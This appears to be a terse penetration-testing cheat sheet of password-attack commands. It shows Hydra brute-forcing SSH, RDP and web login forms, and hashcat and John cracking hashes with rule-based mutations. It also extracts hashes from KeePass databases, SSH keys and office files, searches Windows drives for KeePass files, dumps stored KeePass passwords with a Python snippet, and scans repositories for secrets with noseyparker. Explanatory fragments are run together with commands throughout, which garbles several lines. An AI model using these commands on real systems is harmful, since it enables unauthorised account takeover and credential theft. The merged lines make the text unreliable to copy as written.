sudo hydra -l {username} -P {password_list} -s {port} ssh://{IP}
sudo hydra -L {username_list} -p {password} rdp://{IP}
sudo hydra -l {username} -P {password_list} {IP} http-post-form "/{endpoint}:{param1}=^PASS^:Login failed. Invalid"
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:user=admin&password=^PASS^:Login failed. Invalid"
noseyparker scan {repo/directory}
noseyparker scan --github-org={org}
noseyparker report
datastore.np
before starting a new scanchmod 111 noseyparker
before runninghashcat -r "$1 c $!" {password_list}
will capitalize the first letter of each password, append “1” to the end of each password, and then append “!” to the end of that password
/usr/share/hashcat/rules/
, like rockyou-30000
best64.rule
hashcat -m 0 {hash} {password_list} -r {modification_file} --force
hashcat -h | grep "{information}"
can help find the number to userhashcat -m {number} --example-hash
can provide a good example that hashcat can understandGet-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
will search for kdbx files (KeePass files) containing hasheskeepass2john {keepass_database_file}
to extract hash
- Same goes for pdf2john
, zip2john
, or office2john
- We can then list the passwords like so:from pykeepass import PyKeePass
kp = PyKeePass('{db}.kdbx', password='{password}')
for entry in kp.entries:
print(f"Title: {entry.title}, Username: {entry.username}, Password: {entry.password}")
hashcat -m {hashcat_mode (e.g. 13400)} {hash} {wordlist} -r {mutation} --force
-O -w 4 --opencl-device-types 1,2
hashcat -m 1410 '{password}:{salt}' {wordlist}
to crack itssh2john {private RSA SSH key file} > ssh.hash
will put the hash in a crack-able formathashcat -m 22921 ssh.hash {password_list} -r {mutation} --force
will crack the SSH hash
hashcat --help
responsejohn --wordlist={password_list} --rules=sshRules {hash}
to crack$y$
john {hashfile} --format=crypt --wordlist={wordlist_file}